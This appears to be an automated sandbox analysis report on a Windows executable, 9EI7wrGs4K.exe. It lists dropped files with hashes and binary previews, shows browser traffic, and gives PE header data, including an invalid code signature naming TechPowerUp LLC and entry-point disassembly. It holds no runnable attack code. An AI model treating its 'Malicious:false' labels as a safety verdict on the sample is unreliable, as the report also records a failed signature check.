                                                                                                                                                                                                                                                                                  Size (bytes):64512
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7517361763863475
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:+Oa3HwwuBcozc/mwftIQXoSpu88888888888888888888888888888zv888888NR:TaAwuXc/mex/Sg
                                                                                                                                                                                                                                                                                  MD5:7BBDCF2829F157F4178AD1A4EA31BFE6
                                                                                                                                                                                                                                                                                  SHA1:AFC7C5852F104D94FC2726B3230039B696F17FC2
                                                                                                                                                                                                                                                                                  SHA-256:BAC794EE8129A6EDAA06FED424A8839D24B6B8E6A75C4F23BC8C3E7735498818
                                                                                                                                                                                                                                                                                  SHA-512:D2DD73E8F2B965B9BF9BB806C639AF654646D76628E5C707F29EDE16A1634DD5A699FB239C83C4BCF492B03E2941129AFFC777C39B9851F948A96F537DC844FF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.".......".......".......".......4.......'.......'.......'.......'.......'.......'...............................................Z.......Z.......Z.......Z.......Z.......Z.......Z...............=.......=.......=.......=.......=.......=.......K.......K.......K.......K.......\.......\.......\.......\.......E.......E.......E.......E.......E.......H.......H.......H.......H.......K.......................................!.......!.......!..?....!..?....!..?....!...A.......................J.......V.......d...............p.......~......................................................................................................................................C....!..GA...!..K....!.......!.......!.......!.......!...................................0...........!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......................................................:.......:.......:.......:......................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):68465
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.005168590448056
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:uu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:u4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                                                  MD5:53AB895BB726A4933DD1DC3F2FA2E5F8
                                                                                                                                                                                                                                                                                  SHA1:3933C015286DE1871305AC17679D7244E0C73A07
                                                                                                                                                                                                                                                                                  SHA-256:230C6C15BB57BCB9566D03A0940EB2D8CBB52FD2807CB195982C2541EF7EBBC2
                                                                                                                                                                                                                                                                                  SHA-512:3FFB82FB40E8FF1D98D395601DE10BEB59AF9F77AF6300DBA79E2436EA787EE7DCE026DD43CDDA324515F81EC7B5F48E1DF396CFC3568128468C3CC5E663682B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.".#"=.v......;aoG..{.i.l?#...<4.a0.k.&....CK..v..........io.w.......W$....d.O..%...G.........l...`qq..;....w.....x..L7..G.1...=].....vd..\Xq.:Uu...... "m@.....9.w....]..J.....bawS~.[]W`n......-..p?.>.H. ...l.J..i.E....v..kk....~..m......+.8uy..w.i...Gw6...P..e'..H.i.....8...].....V.....9.............|..8.zc.kSY.=..T....'..l.qc:.|..q.f.U..m;.t..[g...:.'"..Mrlw...~.....MR.X.,.q..,y.....7....Ns`g....(U.....<....P...=.8.[.....2.V.<.....:/..bb..z*.+.....[.NT..... .vg.KG.]f.l..9..t....y1ZZZ|"..{L.yPG..Z..m.r|o7C.qW.cm..+.\.[..w.[....&.]=.....rlw..6;.T,...G..".....3T5 "}...T.X*l`Y./......OV][..`,[.9....FT.Vg3.vq....wD.orhg..C..:.l...........>U...e.T...V.......(Rm....sW.c1...N09....=.-...gx......IDZ........0..Z...q2U.,+`.....z.......H.Z...~.;.....^..oNpi|.$\*[|..$7g./.......Z...p.lQXw..........y..\w-.w.M.....K...w.....g..|...'..+......%X,[.:...... ..=.+.e.#.Nc.'.}...W...c......n..+.l....b...vw..;.t.Q..J.S.a.@.P.>......E........~:\nr..y..
Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
File Type:data
Category:dropped
Size (bytes):118784
Entropy (8bit):6.610127089636133
Encrypted:false
SSDEEP:3072:ywS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLtA:yb2j6AUkB0CThp6vmVnjpA
MD5:3B125D59CE5A2CF242A621511A0FB164
SHA1:3CCBA09F214B941931D6169CA9959ACE2A72ABA7
SHA-256:E4C1FBEDC713173BCEF5C724F3D64283ADD852A64F65C87EB3EC8D86C55833AA
SHA-512:C026F9AA8E83F2C888E2B8336C7EC8380D34873956407E32FAE31FD72BDA741B72C649B7162587435E3D13B9B9FAE8E0552330D710831C774264724C8589F36C
Malicious:false
Preview:xs.]..C<.M.;..t..4......V.M..t....M..i8....u=...y..A..~=.@<.M.;..t..4.....V.M..A....M..68....u..E.C;.|....u.V...YY.M..4.......2._^[....V...N..V..F......t.Q......F..V..$..^.U..V.u.j......Y.M.Qj.VP.....p..0.......^].3..A.f.A..u......U..U.;.t".....B..A..B..A..B..A..B..A..B..A...]....A .......9.|......S....A .......9A.|..A....:...U.......3.V.u.W....f.F.9G ............P....I.....R........8E.t.8.....u.....u....8E.u.....u..F..8.....u.....u..F..8.....u.....u..F..8.[....................F.......Sh........I.....I......f..u.h..........f..t.....u....h........I......f..u.h..........f..t.....u..F..j.....I......f..u.j.......f..t.....u..F..j.....I......f..u.j.......f..t.....u..F..j[....I......f..u.j[......f..t.....u..F..[_..^....U..QQS..3.V..E.W.x.CO.&..e....xPW.....j0Y...f;.r...9w.+.....Ar...Fw...7....ar%..fw ..W........O.E.@.E.....E.|....t..&.2....._^[..y..........<.......<-......<.......<#......<(t.<"t{<%tw<'ts<$to<&tk<!tg<otc<]t_<[t[<\tW<.tS<.tO<_tK<.tG<.tC<.t?<.t;<.t7<.t3<.t/<.t+<.
Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
File Type:data
Category:dropped
Size (bytes):62464
Entropy (8bit):7.996893383300018
Encrypted:true
SSDEEP:1536:BUSTLYdN5/qM8GDI99k/fG3EwYkRinZI6I6+bit:u+L8H/pmk20DnZI6m2
MD5:D947E72346C4AC1ABA8BBDE8BB791F6F
SHA1:F6DC2CFFBC0B29502CBA42D9ADEE2263A7FF4835
SHA-256:A6E6FC90D3C04E2461E3017E9F1DBAA27ABB9278F5DB7BB09A218A3A969FEB41
SHA-512:61E4A6BFB253D4FCF21781324C6DD7B2DFF0750075BFE4CCAFFFF07A4D2FA552016DFB343BB835BFC7E7D6FD80B2B35B9519F2D6958885502758138BAB764E9C
Malicious:false
Preview:..({.....65."...f....k%. +......v.Y.H2....A;U...'.s....3..R_H......QG...&XKw.,.f.MB....6.&tI.G*...J..V.P*... ..]....R.l.N...r.+da..h...d.*..^.t...?K....cR....z...h0...8.sEt...i.h|.c......F..LA.Y9.T.]_..!u...[e.#(.pN.t.0z..[U....N......K7.<..X..%..H..*w.C.E."...|....3...'..2.wi....?i..\(..8F. .s.T..#6...B.Hq..^..&XSgE.w.g....A0.<..w@.....M......r.M{......KP.V]...?......Qh...!....1..z .".*$J..xCB^.T..7.....,....g^.tXs.f...gz%..........5o.."x..2.....Q.g.`=..1..A.. .....L.B.....H.....q.B.<.o."u.ud.7.....y\.....d.Eil.".,.cw..m...Ax!.]R...I..}...<.L*...tj...._N.(..p...+v..3.....O..'V..).......L9M....sY...._..@..|.&UC.!.J..*Fp..).Nc.......\.......O.Ge.t.x...};.U.x.|.R...._.3....2,,+..~..)d.h..?....b....@..5....3....x.b.W{.wB.......i.g..N./..Aq.y....k.9w.g.yx.l2.Y;h..`J..x.XT....80.F.......!.....?90.$.....[.....+'{W.D@.]."[.r.j_...BW.f/.re.*.hpe......U.....V4].X_.=..r.S.Du]Ak.a....@...AAj.B...}.|:.`..-H=.......|.q.tP..h.....g.8b}z4.G8^.<N...
Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
File Type:data
Category:dropped
Size (bytes):55296
Entropy (8bit):6.654459170489211
Encrypted:false
SSDEEP:1536:XaSXL21rKoUn9r5C03Eq30BcrTrhCX4aVml:XtNPnj0nEoXnml
MD5:35469FF6842A57BD9788DB58A1E1C0CC
SHA1:47B76F8AE04AEFF8CDE18E15A6AB9D072214A54A
SHA-256:7006A277A8B2AB82AE4409DF94E227083287B7678B9FFE79E2E19D534F1335EC
SHA-512:3B97531E8D41C069DD9A8A6F3FE0FBC498FACBB6DF823525A726499CF5A4EA40879B7D02138C6D020520DF2D59C28EFC2F51470BF9AAC9F00B6F40101FE51AD0
Malicious:false
Preview:.....~..u..U...@.K..M.P.u..u.......T.U..M.;.r%;.v.;.v/.G.;.w(...}.;.v......;.w....F.;.r..u....Q.M.R.u..U..u..........E..e...;...@......+.@.E..E..@....8.E................U.G...;.v.}..E..M...........;..........}.......]....t1;.s.j.Xf.............B..u=3...@f...........B.(;.s.j.Xf....f.2..f.:..u.3.@f..j.X..f.2..........F..4F...f;.t........M...F..I...A.E...U..H...t4;H s#..+P.........;........E....;H r.U.3.f9C.......jwY..B...Bf9.t.;.r.;........M.....t.9X.t.....u..........M..].U..E.P.u....u..U......jw....g.....C...CXf9.t..T.....N......Q........E..$...E.3.f9D....,....).....F.f;.t.j.Yf;...j.Zf;.................F.j.Zf;.t...}........f.F......f#.....f;...f.F......f#......f;...............}............F..4F......F.f.............f;.u...F.....f;.t....:3.....u..u..U....u..u..9........t.G..F..4F...f;.t....8.......5..F..4F...f;.t..........1L..4F..F..4F...f;.t......jw[...3.B....1L...F.......;u.............I.^.E.#.E.\.A...............F.jwYf9.F..x.......f.~....h....E..GP..\....}..
Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
File Type:data
Category:dropped
Size (bytes):51200
Entropy (8bit):6.555933383144663
Encrypted:false
SSDEEP:1536:65fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubT:ufhnueoMmOqDoioO5bLezW9FfTun
MD5:04DF53FD74B69C92DBA8CD83EAFA1180
SHA1:275765D9C7E3300C0B7579AE3DE32F658E12945C
SHA-256:DB246122E92D7C13AE1050C65C1E1F722F4E98375C9875D719F775CFE1478EE9
SHA-512:44DFA1CCF0C3B054DAC3FADBA5A87C7C56F318C74DFF83810310E349B80029F19A08133C502DD7B65E543B882E567AC19DE54F8A520FF073774894F6F8320EF5
Malicious:false
Preview:..@...Pjr...........9\$Dt......P....D$...@.Ph........3......B..\$0j.....D$4.\$<PW.u..D$L..........x .E....@....f.x..t...@...Pjr.p....L$0.&q......P....D$....f..A.......t$@.L$d.=...D$...P.D$$P.D$hP.u.S.;......L$`.....G....tp....Rt[...t9...t$...t..L$..D$0P....-.t$..L$4..H...:.L$..D$0P.......L$..D$0P.9H...t$..L$4.>.....t$..L$4..N...D$0P.L$$.....t$@.L$d..<...D$ ..P.D$dP.u.......L$`..."G...L$0.!p...Q.t$@.L$d.<...D$...P.D$$P.D$hP.u..t$ .J......L$`.....F...........t$...W.u..N......L$@.F...L$P.o...L$ .D$ ..I..?....t$$.....Y_^[..]...U..E...pSV3.x..W..u....E....].E..E...I..M.].]..].]..]..E......E...H...u..M..].]..F..E..........uF.E......@.Ph.......X....M...F...M...o...M..E...I......u.........9....F.j5Y.M....].f9K..]..M.u(.u..M.;..u..M.t..E..M..0..F.....F..M.B.....jG..B....u.^f;.u........}.......t...B.Ph.....R....M.U.R...P...u....F......@.Ph.....+......E.PSV...f............E......F........A...U.f;E.......jNXf;.......jGXf;....................A..AjNXf9E.u).y..u#j..E.
Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
File Type:data
Category:dropped
Size (bytes):53248
Entropy (8bit):6.721434698149147
Encrypted:false
SSDEEP:768:4Mf17+sVXnQkdFLILu8rbPDmhdimkIXqURPN2mldrfa04VQv7Qf0VosQE7YmFdno:Dh+I+FrbCyI7P4Cxi8q0vQEcmFdno
MD5:7847E23CCE3770257DD905024CDC5020
SHA1:2D2070CB134CCDE38544814A1E1E35A08AB95EA6
SHA-256:75F0206860B962D3636015D98C420EC5EBF4023CA7B75B747AEB388AAFE9049A
SHA-512:97F5B6924C23343F732AB470B8006EF2B25C92FADB3560FD56DB6E53B8DAF0C65CE66EB416BD03126C3B1AE6FA2CF66178A487C0EABAD24263A3DE7253C236B0
Malicious:false
Preview:Y;.t..u.S.3..Y;.u.W.....Y..u..u..7...Y^.u..].S.3...YY..u..E.j.Y..............[_]..U..W.u..~{..Y.M....I....u!...........E.j.Y.................E..@......t........".....E..@...t(.E..`...E..@.......E.t..H....E.j.Y....!..E.SVj.[.......E.j.Y....!..E..`...E..@......u1.u.j..2..Y;.t..u.S.2..Y;.u.W.....Y..u..u..$...Y.u..u.V.....YY..u..E.j.Y................^[_]..U..VW.u..hz..Y.M...I...........M.3..A..1+.@...E..H.I.H...~&.E.V.p.R..........E..H..E...3.;.....d...t....t.....?...k.0.....M......L..@( t.j.WWR.4..#......u..E.j.Y..........j..E.PR.$......H....@_^]..U..VW.u..y..Y.M...I...........M.3..A..1+.......E..H.....H...~(.E.V.p.R...........E..H.f.E.f..3.;.....f...t....t.....?...k.0.....M......L..@( t.j.WWR..3..#......u..E.j.Y..........j..E.PR.R.............@_^]..U..]./.....U..].5...j.h..L....3..u.E..0....Y.u..E....8........?k.0.....M..D.(.t!W.....YP....I...u.........0.I.................u..E.............\.......u.M..1.....Y..U.....E..M..E..E.E.P.u..E.P.D.....]..U..QV.u..
Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
File Type:data
Category:dropped
Size (bytes):95232
Entropy (8bit):4.612003853136968
Encrypted:false
SSDEEP:768:ZKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8qcDP8WBR:ZKaj6iTcPAsAhxjgarB/5el3EYrDWD
MD5:D9EBAE5A1B2F513852F89FDC3D31672D
SHA1:DFA418E6FD3C5B16B685EA0E09CC159A5FF6ED14
SHA-256:B9A3C8E95D261CC9C6B28B58518554120AA2CFA09C2BE81C609C0F01B26B313D
SHA-512:D5A9226EA1152566872669C4072BEA6498C930E405DB45FB6B7B63CD7A807BE814C7A71E983851F5D7A66B131319A850DDB10E1D4661D4CACD3082CB5C1CAEAC
Malicious:false
Preview:.........................................................................................................................................................................................................................................................................................................m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.................................(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(
Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
File Type:data
Category:dropped
Size (bytes):41523
Entropy (8bit):7.995572172924696
Encrypted:true
SSDEEP:768:KQQtn0ggXOoA6vd4BnDiNdFDS0YV56wjvXNRsQEY4qGmScAh6SYN:KQQywQvT1TYV5LjvNyhqGXce67
MD5:6F1A940A0159306F679FF4D03524AE0B
SHA1:2B48523D0BF3828ABD8590E13A03B5946B3D442D
SHA-256:7E294DD8F93A9A7D79FB118070F548D1E8FDA62FA96AF973E1A950F150B0331E
SHA-512:4DDF0AFA24B981BAC3CA60CB52AF73E39BF7155972F49968C8FC85A17F561208D76158CD117948467176696A0BA87B9AC33658C5E7EF1EF3D4201139E959F932
Malicious:false
Preview:...._..*...b@}.+....G.Qb._.._A...Q....u.V.^..-y.R...bP{..1..c_%..%.wt.oCbD.z.2.r'.-......V...h..g9S...e..K.ozJ6.d........F<;I.<nv.r..-.W.*s"q.>A.`. ....]Q&[...B.......b(...... .7...{..,m1.%...I.%...&... .........&[.67*.+..&..@.LV......B.C..W..2.y...Ji.L1..DY.h..6..z.B..n..K.A..P....1+J%..~.)....Q.M4.s.$..\X6..O...,_...V.7..O../........~.$yV(-.@...^.6..../.A.q..L.mN...B....S.NO...j.....iN.8........`...}.a.4..#>.....-..j\3.E0...6~...N*...0.......T......c.c.5..H...@].Ax..P@...W=T.2(w_.......iRO'.wF......@L.)......T....Dp..z9.s......w .....^........o...*n.W.a.V.^o.=..G..q..2.g<5....C.... .......S...BM."..MzHK...v.Z*..H.........v?IT..f1.N.ts.....dIQ=.[..dWg.4OR;.h.x.P.i......Cj...@W.zg...L,...y.f25D...}M..5.]..NB!8.9..L*;..AT..z..?....)z.....Z....oA.WM.(..H.J......|.4..2. ...9...e..g..z...[..2]-a.N,@..;......3...I$..#.9..Z9...<..[X...'m....>.../.....WPe.@.._...=P........|`R...`..a.)...I(J.R......z. .......1B7..d.=..jy.q`&..4n..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3198)
                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                  Size (bytes):3203
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.830377803857918
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:jIlglikIN6666VPxM//IE+nOsms9cWO/KCG4KHQffffo:j5WN6666VZpJ6sqKC0
                                                                                                                                                                                                                                                                                  MD5:7967BA56CDED3C8F10B7012991BA94DF
                                                                                                                                                                                                                                                                                  SHA1:A5A853E2F64B0234F49BF22056AD711A4F525911
                                                                                                                                                                                                                                                                                  SHA-256:547A69554D9F4D3077E2DA90FDF908D38D95218B6BC909C770CE0FEEC0A1B9DF
                                                                                                                                                                                                                                                                                  SHA-512:A4509FBB9876628639A94145D1556625406679A5C92222D14555B527070B8E5349F1A6D14AC26994505214095731D4AC3B63E11BCDBC258F1A771F8E1197E6A9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                  Preview:)]}'.["",["sonic the hedgehog 3 movie box office","walker buehler","winter weather advisory","ursid meteor shower","palworld update","party city closing stores","gladiator ii streaming","nfl mvp odds"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"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
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                  MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                  SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                  SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                  SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                  Size (bytes):132723
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.436647375682781
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:fTkJQ7O4N5dTm+syHEt4W3XdQ4Q6tuSr/nUW2i6o:fGQ7HTt/sHdQ4Q6tDfUW8o
                                                                                                                                                                                                                                                                                  MD5:6B3BE793756486DC499E58FF6327980B
                                                                                                                                                                                                                                                                                  SHA1:D9E8B26C18C7E003CF2A60374BEC7DCCBCA43E19
                                                                                                                                                                                                                                                                                  SHA-256:187EF3FB59922377ED6C92A8FBF26178B99B73A732F32B4A8E1D1056D736A1D4
                                                                                                                                                                                                                                                                                  SHA-512:5E0240770261EB321577F43A270A2E1FBD35E680589AD9E084E6E548C25770DAABB3B32502F5E1D2CABEDBE2F3D465BE9523BBC7C96798C1F489CE17DDB894E6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.96744840145825
                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                  File name:9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File size:863'093 bytes
                                                                                                                                                                                                                                                                                  MD5:8eb4f92605e35c57a42b0917c221d65c
                                                                                                                                                                                                                                                                                  SHA1:0e64d77ef1b917b3afe512b49710250c71369175
                                                                                                                                                                                                                                                                                  SHA256:b57d78d93f74f7ae840ab03d3fda4f22a24ad35afcf9a53128cf82a92a67a085
                                                                                                                                                                                                                                                                                  SHA512:4cc5db426c8de3d7afdcfa26440d5bd9a885f5148e4307b8d04c5d56c96672d5c82ed9989bf346ce7aecea07d980735c46a930b885f824ba53738ac76dbb05bf
                                                                                                                                                                                                                                                                                  SSDEEP:24576:qWryjPGki4+5vfHU3fYFy664hRvRKMU+Et:1+FQVUPA/v8MhQ
                                                                                                                                                                                                                                                                                  TLSH:5F052346AFD8007ADEA10FBA33F0EAA34D757D512CB4D61B2396CE8D6CE56C14D6430A
                                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                                                                                                                                  Icon Hash:34b818e8ece81848
                                                                                                                                                                                                                                                                                  Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                  Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                                                                                                                  Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                                                                                                                                  Not Before, Not After
• 24/06/2022 09:22:08 14/04/2025 16:06:58
Subject Chain
• OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Washington, OID.2.5.4.15=Private Organization, CN=TechPowerUp LLC, SERIALNUMBER=604 057 982, O=TechPowerUp LLC, L=Spokane, S=Washington, C=US
Version: 3
Thumbprint MD5: 648FDCF28A095B6DA4C31C9D5CD35A64
Thumbprint SHA-1: 8DAAE716F69B30A0DDC8C8A3F8EAC6C5B328CFD2
Thumbprint SHA-256: 20740B0C498F45830DD1D84EC746DEA5E43C2B0D32C603F2C2403A333CE9E8E7
Serial: 115BBE9E1C286827AF66E7A01390C206
Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007F66986877ABh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007F669868748Dh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007F669868747Bh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007F6698684D7Ah
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007F6698687151h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F6698684E03h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F6698684D7Ah
add esi, 02h
cmp word ptr [esi], bx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ C ] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x52ba | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd06a5 | 0x24d0 | .ndata
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
